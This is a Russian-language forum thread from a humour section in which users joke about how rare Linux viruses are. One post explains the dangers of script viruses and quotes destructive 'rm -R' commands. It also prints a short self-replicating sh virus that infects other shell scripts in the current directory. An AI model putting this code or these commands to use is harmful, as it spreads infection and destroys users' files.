# Вирусы в Linux

**URL:** <http://linux.ru/forum/t/linux/5871>\
**Category:** Юмор\
**Created:** [15.Март.2007 11:56:08 UTC](http://linux.ru/forum/t/linux/5871 "2007-03-15T11:56:08Z")\
**Posts on this page:** 20\
**Page:** 1

<div class="post-metadata">

**Author:** ![Firebird](http://linux.ru/forum/letter_avatar_proxy/v4/letter/f/2acd7d/32.png) [@Firebird](http://linux.ru/forum/u/Firebird)\
**Post date:** [15.Март.2007 11:56:08 UTC](http://linux.ru/forum/t/linux/5871/1 "2007-03-15T11:56:08Z")

</div>

\<graveworm\> предлогаю приятелю переходить на линукс

\<graveworm\> он очень боица вирусов

\<webster\> да в линуксе стоит бояцо их)))

\<webster\> их же целых 9 ))))

\<webster\> и то половина не работает

\<webster\> с остальной половиной надо ебацо чтобы установить

---

<div class="post-metadata">

**Author:** ![Ineu](http://linux.ru/forum/letter_avatar_proxy/v4/letter/i/45deac/32.png) [@Ineu](http://linux.ru/forum/u/Ineu)\
**Post date:** [15.Март.2007 12:00:07 UTC](http://linux.ru/forum/t/linux/5871/2 "2007-03-15T12:00:07Z")

</div>

БОР переезжает на линухру?

---

<div class="post-metadata">

**Author:** ![Hans\_R\_Steiner](http://linux.ru/forum/letter_avatar_proxy/v4/letter/h/76d3ee/32.png) [@Hans\_R\_Steiner](http://linux.ru/forum/u/Hans_R_Steiner)\
**Post date:** [16.Март.2007 16:46:26 UTC](http://linux.ru/forum/t/linux/5871/3 "2007-03-16T16:46:26Z")

</div>

Кстати, а у кого-нибудь есть вирус для линукс?

Я уже семь лет ищу сие чудо

---

<div class="post-metadata">

**Author:** ![tiger\_by](http://linux.ru/forum/letter_avatar_proxy/v4/letter/t/bbce88/32.png) [@tiger\_by](http://linux.ru/forum/u/tiger_by)\
**Post date:** [18.Июнь.2007 08:16:59 UTC](http://linux.ru/forum/t/linux/5871/4 "2007-06-18T08:16:59Z")

</div>

самый главный вирус это кривые ручки

---

<div class="post-metadata">

**Author:** ![AlexzAK](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/90db22/32.png) [@AlexzAK](http://linux.ru/forum/u/AlexzAK)\
**Post date:** [20.Июнь.2007 06:22:16 UTC](http://linux.ru/forum/t/linux/5871/5 "2007-06-20T06:22:16Z")

</div>

Я тоже хочу вирус!

Уже 3ий месяц все работает и никакой активности вирусов

Я скучаю по ним

---

<div class="post-metadata">

**Author:** ![lcd\_swat](http://linux.ru/forum/letter_avatar_proxy/v4/letter/l/22d042/32.png) [@lcd\_swat](http://linux.ru/forum/u/lcd_swat)\
**Post date:** [20.Июнь.2007 07:58:47 UTC](http://linux.ru/forum/t/linux/5871/6 "2007-06-20T07:58:47Z")

</div>

А что?! Я вот видел вирус в NIX! Вот прям своими глазами! Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe. Я даже сохранил у себя его, так, на всякий пожарный. И так, что мы имеем - вирус в линуксе быть может, а работать…хм…под wine что ли попробовать

---

<div class="post-metadata">

**Author:** ![molodoy](http://linux.ru/forum/letter_avatar_proxy/v4/letter/m/59ef9b/32.png) [@molodoy](http://linux.ru/forum/u/molodoy)\
**Post date:** [06.Октябрь.2007 04:28:56 UTC](http://linux.ru/forum/t/linux/5871/7 "2007-10-06T04:28:56Z")

</div>

А они что реально существуют???

---

<div class="post-metadata">

**Author:** ![Firebird](http://linux.ru/forum/letter_avatar_proxy/v4/letter/f/2acd7d/32.png) [@Firebird](http://linux.ru/forum/u/Firebird)\
**Post date:** [06.Октябрь.2007 06:08:55 UTC](http://linux.ru/forum/t/linux/5871/8 "2007-10-06T06:08:55Z")

</div>

Есть, конечно, но их нужно долго устанавливать ))

---

<div class="post-metadata">

**Author:** ![AccessD](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/6de8d8/32.png) [@AccessD](http://linux.ru/forum/u/AccessD)\
**Post date:** [06.Октябрь.2007 10:03:32 UTC](http://linux.ru/forum/t/linux/5871/9 "2007-10-06T10:03:32Z")

</div>

ага, wine’ом

---

<div class="post-metadata">

**Author:** ![Moin](http://linux.ru/forum/letter_avatar_proxy/v4/letter/m/c89c15/32.png) [@Moin](http://linux.ru/forum/u/Moin)\
**Post date:** [10.Октябрь.2007 20:10:58 UTC](http://linux.ru/forum/t/linux/5871/10 "2007-10-10T20:10:58Z")

</div>

кто ЛОР читал на баше не смеётся!

---

<div class="post-metadata">

**Author:** ![AndreyMust19](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/3da27b/32.png) [@AndreyMust19](http://linux.ru/forum/u/AndreyMust19)\
**Post date:** [09.Март.2009 11:36:06 UTC](http://linux.ru/forum/t/linux/5871/11 "2009-03-09T11:36:06Z")

</div>

**Hans R. Steiner**

_у кого-нибудь есть вирус для линукс?_

**AlexzAK**

_Я тоже хочу вирус!_

Вирусы в Linux есть и не только в нем, но, как говорится - их мало. Мое мнение - гораздо опасней не бинарные (к-е будут запускаться только на узком числе машин), а скриптовые. Причины:

- sh или bash установлен на всех машинах

- эти оболочки во всех UNIX устроены одинаково

- в системе есть достаточно консольных программ не только для обычных гадостей, но и для вирусов.

Вот скажите. Вы скачали sh-скрипт, который распаковывает tar-gz архив. При этом вы запускаете его от root’а. А где гарантия, что в нем какой-нибудь вредоносной команды, вроде ‘rm -R /’, которая туда была вставлена умышленно? И в результате запуска оного скрипта вы остаетесь у разбитого корыта. Даже если вы запускаете его не от рута, команда ‘rm -R $HOME/\*’ принесет пользователю много вреда - удалит все его файлы и настройки.

Интересующихся могу послать к статье Криса Касперского “Вирусы в UNIX, или Гибель Титаника II” (по-моему есть на [www.wasm.ru](http://www.wasm.ru)). Вот пример очень простого sh-вируса:

#!/bin/sh

#Вирус “sh-450”. Удалите эту и строку и “exit”, чтобы вирус мог получить управление.

exit

for F in \*

do

#Если в первой строке найдено “#!” и “/sh”, значит $F - sh-скрипт

if [“$(head -c9 “$F” | grep -s -E -H “#!” 2\>/dev/null)” != “”]; then #This $F - a Script

if [“$(head -c9 “$F” | grep -s -E -H “/sh” 2\>/dev/null)” != “”]; then #$F - a sh-Script

if [“$(tail -n1 “$F” 2\>/dev/null)” != “#Virus v.1.1”]; then #$F - not infected

tail -12 $0 \>\> “$F” 2\>/dev/null;

fi

fi

fi

done

#Virus v.1.1

Этот скрипт ищет в текущем каталоге все не зараженные sh-скрипты (в конце к-х нет ‘#Virus v.1.1’) и копирует в их конец последние 12 строчек своего тела. Это очень простой пример. Есть еще полиморфные и закодированные вирусы, и такие, у к-х умышленно усложнен алгоритм чтобы ни пользователи, ни антивирусы не поняли алгоритм его работы.

**lcd\_swat**

_Засунул в Mac флэшку, а там в корне два файла висят - autorun.inf и toy.exe._

**AccessD**

_ага, wine’ом_

Нет, это - Windows-гадости, к UNIX они не имеют никакого отношения! Бинарных вирусов, скомпилированных для Linux всего-лишь 50-60. Мне неизвестно - сколько скриптовых.

Не стоит думать что если в UNIX нет вирусов - то она безопасна. В этой системе другая раскладка сил. Для размножения вирусов чтобы программа была запущена от root’а. Размножение вирусов практически ограничено потому что никто не будет от root’а запускать офисную или прикладную программу, - в основном запускаются те, к-е были созданы во время установки системы. В Windows 98% юзеров сидят под администратором, поэтому любая запущенная программа может писать в другую программу.

А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows, несмотря на то, что даже Linux встречается в тысячи раз реже, чем Windows. Черви спокойно существуют в UNIX-системах (хотя бы про червь Морриса все слышали - поражал BSD 4), есть черви Slapper и Scalper. Во-первых играет роль наличие исходников уязвимых программ, во-вторых, заплатки выпускаются реже (посмотрите на FreeBSD - 1/3 дыр еще не закрыта , хотя для некоторых из них уже есть эксплоиты). И в-третьих, сами заплатки устанавливаются реже - их установка и новых версий гораздо проблематичнее:

1. установка программ в UNIX дольше и сложнее, чем в Windows

2. после обновления программы может потребоваться обновление других программ, вплоть до ядра.

В UNIX также более распространены руткиты (скрывающие свое присутствие в системе). В Windows они практически не нужны - ведь все программы в 98% случаев итак запускаются от Администратора.

Итак, под UNIX никогда не будет много бинарных вирусов (а вот скриптовых - может быть больше). А вот новые черви и руткиты будут гораздо более знаменитыми.

Так что… не огорчайтесь - на каждую старуху своя пруха!

---

<div class="post-metadata">

**Author:** ![AccessD](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/6de8d8/32.png) [@AccessD](http://linux.ru/forum/u/AccessD)\
**Post date:** [09.Март.2009 16:44:21 UTC](http://linux.ru/forum/t/linux/5871/12 "2009-03-09T16:44:21Z")

</div>

| **Цитата:** |  
|

Интересующихся могу послать к статье Криса Касперского “Вирусы в UNIX, или Гибель Титаника II”

|

попадалась несколько лет назад.. вода водой, человеку видать писать уже нечего было, вот и решил ещё куда-нибудь залезть.

---

<div class="post-metadata">

**Author:** ![Legalizer](http://linux.ru/forum/letter_avatar_proxy/v4/letter/l/53a042/32.png) [@Legalizer](http://linux.ru/forum/u/Legalizer)\
**Post date:** [09.Март.2009 17:32:11 UTC](http://linux.ru/forum/t/linux/5871/13 "2009-03-09T17:32:11Z")

</div>

**2 AndreyMust19**

Мужчина, вы серьезны как рак легких в своих рассуждениях. Теперь внимание вопрос: вы лично видели вирус под GNU/Linux \_в диком виде\_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

Я вот пользуюсь системой с 2001 года. Последние года три-четыре GNU/Linux у меня стоит дома и на работе. И при этом я лично не сталкивался с какими либо вирусами и т.п. Я что-то делаю не так?

Вот об этом и были все ШУТКИ в этом топике (а мы с вами в разделе “Юмор” назодимся, если что)

Но вы все же смогли удачно пошутить. В частности, имеется в виду фраза: “А вот посмотрите на червей. В UNIX их почти столько же, сколько для Windows”. Это развеселило.

И еще нужно понимать, что запуск чего бы то ни было от root - это довольно неумное действие. Тем более в вашем примере (когда скачал невесть что и давай его пускать от рута не глядя). А вот если будете пускать от пользователя, то масштабы бедствия ограничатся проблемами в домашней директории пользователя и директориями, на которые он имеет права на запись. При этом сама система не навернется. А вы ведь делаете регулярные бэкапы, да? Следовательно и восстановить пользовательскую директорию не проблема, да?

---

<div class="post-metadata">

**Author:** ![Hans\_R\_Steiner](http://linux.ru/forum/letter_avatar_proxy/v4/letter/h/76d3ee/32.png) [@Hans\_R\_Steiner](http://linux.ru/forum/u/Hans_R_Steiner)\
**Post date:** [09.Март.2009 17:45:17 UTC](http://linux.ru/forum/t/linux/5871/14 "2009-03-09T17:45:17Z")

</div>

Вайт, ты просто линуксом пользоваться не умеешь… по этому у

тебя и вырусов нет… ты не умеешь их правильно искать и

запускать (видимо, я тоже не умею… за шесть лет практически

полного необщения с виндовсом, разучился… все навыки

растерял)

кстати:

[http://ru.wikipedia.org/wiki/Список\_компьютерных\_вирусов\_и\_ч ервей\_под\_Linux](http://ru.wikipedia.org/wiki/%D0%A1%D0%BF%D0%B8%D1%81%D0%BE%D0%BA_%D0%BA%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D0%BD%D1%8B%D1%85_%D0%B2%D0%B8%D1%80%D1%83%D1%81%D0%BE%D0%B2_%D0%B8_%D1%87%D0%B5%D1%80%D0%B2%D0%B5%D0%B9_%D0%BF%D0%BE%D0%B4_Linux)

Но… лично я, вживую, ни одного не видел… и на самом деле, я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один, хотя бы в конкретной, отдельно взятой системе

---

<div class="post-metadata">

**Author:** ![Legalizer](http://linux.ru/forum/letter_avatar_proxy/v4/letter/l/53a042/32.png) [@Legalizer](http://linux.ru/forum/u/Legalizer)\
**Post date:** [09.Март.2009 17:48:22 UTC](http://linux.ru/forum/t/linux/5871/15 "2009-03-09T17:48:22Z")

</div>

ГГ

Видимо так и есть

---

<div class="post-metadata">

**Author:** ![AccessD](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/6de8d8/32.png) [@AccessD](http://linux.ru/forum/u/AccessD)\
**Post date:** [09.Март.2009 18:38:13 UTC](http://linux.ru/forum/t/linux/5871/16 "2009-03-09T18:38:13Z")

</div>

**To Legalizer, Hans R. Steiner:**

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй )))

Конец там был что-то вроде - “вы хотите уподобиться такому страусу? а я нет!” ))

---

<div class="post-metadata">

**Author:** ![Hans\_R\_Steiner](http://linux.ru/forum/letter_avatar_proxy/v4/letter/h/76d3ee/32.png) [@Hans\_R\_Steiner](http://linux.ru/forum/u/Hans_R_Steiner)\
**Post date:** [09.Март.2009 19:03:09 UTC](http://linux.ru/forum/t/linux/5871/17 "2009-03-09T19:03:09Z")

</div>

Спациально нашел статью этого страуса

“Что бы там не говорили фанатики UNIX, но вирусы размножаются и на этой платформе. Отмахиваться от этой проблемы – означает уподобиться страусу. Вы хотите быть страусами? Я думаю – нет!”

[http://xakforum.ru/index.php?topic=107.0](http://xakforum.ru/index.php?topic=107.0)

“Если на машине постоянно обновляется большое количество программного обеспечения (в том числе и создаваемого собственными силами), привилегии на модификацию исполняемых файлов становятся просто необходимы, в противном случае процесс общения с компьютером из радости рискует превратиться в мучение.”

Ч..еловек, из страха перед большой птицей, решил заняться поиском привидений и охотой на ведьм

В общем, если почитать статью, хохма на хохме, косяк на косяке, а Касперский - страус

---

<div class="post-metadata">

**Author:** ![Ineu](http://linux.ru/forum/letter_avatar_proxy/v4/letter/i/45deac/32.png) [@Ineu](http://linux.ru/forum/u/Ineu)\
**Post date:** [09.Март.2009 19:05:29 UTC](http://linux.ru/forum/t/linux/5871/18 "2009-03-09T19:05:29Z")

</div>

| **AccessD писал(а) Mon, 09 March 2009 20:38** |  
|

кстати, в той статейке никсойдов обозвали страусами, прячущими головы в песок, вместо того, чтобы бороться с вируснёй )))

Конец там был что-то вроде - “вы хотите уподобиться такому страусу? а я нет!” ))

|

Человеку деньги надо зарабатывать, а Вы шутки шутите!

---

<div class="post-metadata">

**Author:** ![AndreyMust19](http://linux.ru/forum/letter_avatar_proxy/v4/letter/a/3da27b/32.png) [@AndreyMust19](http://linux.ru/forum/u/AndreyMust19)\
**Post date:** [10.Март.2009 21:08:31 UTC](http://linux.ru/forum/t/linux/5871/19 "2009-03-10T21:08:31Z")

</div>

**Legalizer**

| **Цитата:** |  
|

вы лично видели вирус под GNU/Linux \_в диком виде\_ хоть раз в жизни (в том числе в вашей профессиональной деятельности, если вы как-то связаны с IT).

|

Я вас не пугаю - я вас предупреждаю. Даже если вы работаете в UNIX-системе, не забывайте обновлять ядро и все установленные в ней программы (или пользуйтесь стабильными версиями без ошибок).

| **Цитата:** |  
|

Это развеселило.

|

А я - серьезно.

**AccessD**

| **Цитата:** |  
|

вода водой,

|

я не советую эту статью, я вам ее назвал только чтобы е возникали вопросы “откуда ты это узнал?”.

**Hans R. Steiner**

| **Цитата:** |  
|

я даже боюсь себе представить то, как долго придется заниматься мозгосексом для того, чтобы заставить работать хотя бы один

|

Вот поэтому я и говорю - забудьте о вирусах! Есть черви и руткиты.

---

<div class="post-metadata">

**Author:** ![Hans\_R\_Steiner](http://linux.ru/forum/letter_avatar_proxy/v4/letter/h/76d3ee/32.png) [@Hans\_R\_Steiner](http://linux.ru/forum/u/Hans_R_Steiner)\
**Post date:** [10.Март.2009 21:26:59 UTC](http://linux.ru/forum/t/linux/5871/20 "2009-03-10T21:26:59Z")

</div>

Черви - в ту же стопку, что и вирусы

Руткиты - для этого надо сперва заиметь доступ к моим

системам… а сие, с целью установки руткитов, рискованно для

здоровья

В общем, если взять любую, даже самую тупую книгу по

информационной безопасности, Вы там сможете найти на первых же

страницах, что если на Вас кто-то положит глаз, максимум что Вы

сможете сделать - довести систему до уровня, когда взлом будет

нерентабельным с точки зрения соотношения затрат к выгоде… все

остальные случаи - либо кривые руки админа, либо сказки на

ночь… забудьте… вирусов и червей под линукс нет, а те что

есть и при этом у Вас работают, написаны специально для Вас, а

если так, Вам терять уже нечего

[Следующая страница](http://linux.ru/forum/t/linux/5871.md?page=2)
